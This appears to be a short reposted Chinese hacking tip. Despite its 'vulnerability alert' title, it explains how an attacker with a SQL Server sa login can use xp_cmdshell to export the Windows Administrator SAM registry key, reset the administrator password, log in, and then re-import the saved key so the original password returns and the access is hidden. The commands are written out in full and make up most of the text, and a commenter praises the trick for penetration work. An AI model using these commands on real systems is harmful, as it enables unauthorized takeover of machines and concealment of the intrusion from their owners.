来源:红狼
sa默认可以读sam键.应该,
导出管理员密码文件漏洞预警
。reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:\old.reg
根本不用克隆.
找到对应的sid.
/*不狐:这则经验非常不错,前面我做过一次渗透就没想到可以这样来!
默认情况下sa继承system权限,对sam键值有完全控制权限,
电脑资料
《导出管理员密码文件漏洞预警》(http://meiwen.anslib.com)。SQL代码
exec master..xp_cmdshell "reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg"--
或者
SQL代码
exec master..xp_cmdshell "regedit -e C:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4"--
都是可行的。